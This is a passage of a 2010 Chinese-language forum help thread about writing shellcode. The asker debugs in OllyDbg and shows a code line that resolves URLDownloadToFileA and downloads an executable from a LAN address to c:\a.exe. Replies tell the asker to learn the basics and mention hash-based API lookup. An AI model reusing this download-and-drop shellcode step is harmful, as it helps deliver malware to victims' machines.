首页
社区
课程
招聘
[求助]shellcode 問題?
发表于: 2010-6-15 01:49 9400

[求助]shellcode 問題?

2010-6-15 01:49
9400
收藏
免费 1
支持
分享
最新回复 (30)
雪    币: 7651
活跃值: (523)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
26
你难道不会调试吗?会调试的话其实很好办…
2010-6-16 18:00
0
雪    币: 160
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
27
唔係好熟識, 我用ollydbg看那一段shellcode,那一些 ebp, esp 等暫存器有我push的string
和address我想應該是getprocaddress的return value, 例如:
ebp = 00xxxxx 我想應該是URLDownloadToFile這個address我直接call ebp但都不可以..
不太了解ASM 如何用一個API的return value來做...

  lpAddFun  addFun=(lpAddFun)GetProcAddress(hDll, "URLDownloadToFileA");
addFun=URLDownloadToFileA

addFun(0,"http://192.168.0.100/a.exe","c:\\a.exe",0,0);

但lpAddFun  addFun= ...  asm是如何寫?? 我用OLLYDBG 看到是執行完call GetProcAddress
ebp有一個address 我想應該是URLDownloadToFileA 這個API的address..但總是不能成功...
2010-6-17 00:24
0
雪    币: 16
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
28
你先回去把基础知识学好吧
基础的东西你都不会,还玩什么shellcode
2010-6-17 01:39
0
雪    币: 16
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
29
你这个问题很简单,没必要再问了,自己把基础打牢,不要指望别人手把手地教你
2010-6-17 01:41
0
雪    币: 180
活跃值: (76)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
30
每台机子的MessageBox地址未必一样 要通过搜索hash获得Messagebox的地址
2010-6-17 09:57
0
雪    币: 160
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
31
ok 了
2010-6-17 21:54
0
游客
登录 | 注册 方可回帖
返回
//